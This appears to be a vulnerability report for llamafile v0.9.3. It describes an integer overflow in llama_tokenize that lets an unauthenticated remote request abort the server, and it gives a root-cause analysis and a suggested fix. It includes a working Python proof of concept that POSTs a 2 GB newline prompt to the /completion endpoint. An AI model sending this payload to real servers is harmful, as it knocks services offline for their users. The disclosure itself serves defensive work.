Description
Contact Details
What happened?
Launching llamafile with any GGUF file:
./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf
Proof of Concept (PoC)
Open another terminal and run:
python3 3.py
where 3.py contains:
import requests

resp = requests.post(
    "http://127.0.0.1:8080/completion",
    json={
        "prompt": "\n" * 2147483648,
        "n_predict": 20
    }
)
print(resp.json())
After a short period, llamafile terminates with:
>>> libc++abi: terminating due to uncaught exception of type std::length_error: vector
error: Uncaught SIGABRT (SI_TKILL) at 0x3f10017a4c2 on XXF-GPU-03 pid 1549506 tid 1549508
./llamafile
No error information
Linux Cosmopolitan 3.9.7 MODE=x86_64; #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 XXF-GPU-03 5.15.0-140-generic
RAX 0000000000000000 RBX 0000000000000006 RDI 000000000017a4c4
RCX 00000000009ae101 RDX 0000000000000000 RSI 0000000000000006
RBP 00007fcda6d890c0 RSP 00007fcda6d890c0 RIP 00000000009ae101
R8 0000000000000000 R9 0000000000000000 R10 00000000009ae101
R11 0000000000000296 R12 0000000000b6b4e8 R13 00000000009c3000
R14 0000000000b6b4d0 R15 00007fcda6d893c0
TLS 00007fcda7bebd00
XMM0 00000000000000000000000000000000 XMM8 00000000000000000000000035800000
XMM1 00000000000000000000000000000000 XMM9 755f6e66662e64252e6b6c622e636e65
XMM2 000000000000000000007fcda6d881e0 XMM10 00000000000000000000000000000000
XMM3 726573753e7c74726174735f6d697c3c XMM11 00000000000000000000000000000000
XMM4 000000000000705f6c61636970797412 XMM12 00000000000000000000000000000000
XMM5 00000000000000000000000000000000 XMM13 00000000000000000000000000000000
XMM6 00007a5f7366740a00007fcda6d89530 XMM14 00000000000000000000000000000000
XMM7 00007fcda6d898f000006b5f706f740a XMM15 00000000000000000000000000000000
cosmoaddr2line /data/ylwang/Projects/llamafile/out/bin/llamafile 9ae101 99700b 4078c5 9c2eaa 9c2fae 96f126 96ed52 428bf1 429fdb 458120 4a4c63 574f46 574efb 48599e 47f2a4 44c1af 44337d 521db5 97a384 98c884 9fc9c7
0x00000000009ae101: ?? ??:0
0x000000000099700b: ?? ??:0
0x00000000004078c5: ?? ??:0
0x00000000009c2eaa: ?? ??:0
0x00000000009c2fae: ?? ??:0
0x000000000096f126: ?? ??:0
0x000000000096ed52: ?? ??:0
0x0000000000428bf1: ?? ??:0
0x0000000000429fdb: ?? ??:0
0x0000000000458120: ?? ??:0
0x00000000004a4c63: ?? ??:0
0x0000000000574f46: ?? ??:0
0x0000000000574efb: ?? ??:0
0x000000000048599e: ?? ??:0
0x000000000047f2a4: ?? ??:0
0x000000000044c1af: ?? ??:0
0x000000000044337d: ?? ??:0
0x0000000000521db5: ?? ??:0
0x000000000097a384: ?? ??:0
0x000000000098c884: ?? ??:0
0x00000000009fc9c7: ?? ??:0
000000400000-000000b851e0 r-x-- 7700kb
000000b86000-000003306000 rw--- 40mb
0006fe000000-0006fe001000 rw-pa 4096b
7fc927f05000-7fcb9b305000 rw-pa 10gb
7fcbec905000-7fcc6cb05000 rw-pa 2050mb
7fcd0cd05000-7fcd8efe1fc0 rw-pa 2083mb
7fcd8efe2000-7fcd8f212fc0 rw-pa 2244kb
7fcd8f213000-7fcd8f42ffc0 rw-pa 2164kb
7fcd8f430000-7fcd8f660fc0 rw-pa 2244kb
7fcd8f661000-7fcd90757fc0 rw-pa 17mb
7fcd90758000-7fcd90758fc0 rw-pa 4032b
7fcd90759000-7fcd90759fc0 rw-pa 4032b
7fcd9075a000-7fcd9075afc0 rw-pa 4032b
7fcd9075b000-7fcd9076ffc0 rw-pa 84kb
7fcd90770000-7fcd90770fc0 rw-pa 4032b
# 15'345'442'816 bytes in 26 mappings
./llamafile --host 0.0.0.0 -m /data/ylwang/Projects/llamafile/test++/0.gguf
The crash log shows a fatal abort caused by std::length_error while constructing a std::vector.
Root Cause
In ./llama.cpp/common.cpp:2667, the function llama_tokenize calculates the token buffer size as:
int n_tokens = text.length() + 2 * add_special;
std::vector<llama_token> result(n_tokens);
text.length() returns a size_t (64-bit unsigned).
When the user provides an extremely large input (e.g., a prompt of 2,147,483,648 characters), text.length() exceeds the maximum representable value of a 32-bit signed integer. This value is then assigned to int n_tokens, causing an integer overflow, which wraps the result into a negative value.
Printing the value confirms:
n_tokens = -2147483648
This negative size is then passed to the std::vector constructor, where it is implicitly converted to an enormous size_t value that exceeds max_size(); the constructor throws std::length_error, and because the exception is never caught, the llamafile process terminates.
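The wrap-around can be reproduced in isolation. The standalone sketch below is not llamafile source; it only mirrors the narrowing assignment from common.cpp:2667, and add_special is assumed to be false here, which is what makes the printed value match the one observed above on a typical two's-complement platform.

#include <cstdio>

int main() {
    // Length of the PoC prompt: 2,147,483,648 one-byte '\n' characters,
    // i.e. the value text.length() returns inside llama_tokenize.
    unsigned long long length = 2147483648ULL;
    bool add_special = false;  // assumption: no special tokens added for this call

    // The narrowing conversion wraps past INT_MAX on common platforms.
    int n_tokens = (int)(length + 2 * add_special);
    printf("n_tokens = %d\n", n_tokens);  // prints: n_tokens = -2147483648

    // std::vector<llama_token> result(n_tokens) would then convert this
    // negative int to an enormous size_t, exceed max_size(), and throw
    // std::length_error.
    return 0;
}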
Impact
A remote attacker who can send requests to the HTTP server can trigger the integer overflow by supplying an extremely large prompt, causing llamafile to abort. This leads to a fully remote, unauthenticated Denial-of-Service condition.
In llama.cpp
In contrast, the standalone llama.cpp server survives the same condition: the oversized vector allocation is caught and reported as an error instead of terminating the process. Running the same request against a model launched directly via llama.cpp:
import requests

resp = requests.post(
    "http://127.0.0.1:8080/v1/chat/completions",
    json={
        "messages": [
            {"role": "user", "content": "\n" * 2147483648}
        ],
        "max_tokens": 20
    }
)
print(resp.text)
produces a controlled error:
{"error":{"code":500,"message":"cannot create std::vector larger than max_size()","type":"server_error"}}
This demonstrates that llama.cpp keeps the failure contained to the offending request and continues serving, whereas llamafile aborts the entire process.
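One way llamafile could obtain the same graceful behavior is to validate the computed buffer size before narrowing it to int. The helper below is only a sketch: the name checked_token_buffer_size is hypothetical and not part of llamafile or llama.cpp, and where exactly it would be called inside llama_tokenize would need to be confirmed against common.cpp.

#include <cstddef>
#include <limits>
#include <stdexcept>
#include <string>

// Hypothetical helper (illustrative only): compute the token-buffer size the
// same way common.cpp:2667 does, but refuse values that cannot be represented
// as a non-negative int.
static int checked_token_buffer_size(const std::string & text, bool add_special) {
    const std::size_t upper_bound = text.length() + (add_special ? 2 : 0);
    if (upper_bound > static_cast<std::size_t>(std::numeric_limits<int>::max())) {
        // Surface a recoverable error instead of letting std::vector throw
        // std::length_error and abort the whole server process.
        throw std::runtime_error("input text is too long to tokenize");
    }
    return static_cast<int>(upper_bound);
}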
Version
llamafile v0.9.3
What operating system are you seeing the problem on?
Linux
Relevant log output
Please see the ``What happened?`` section above.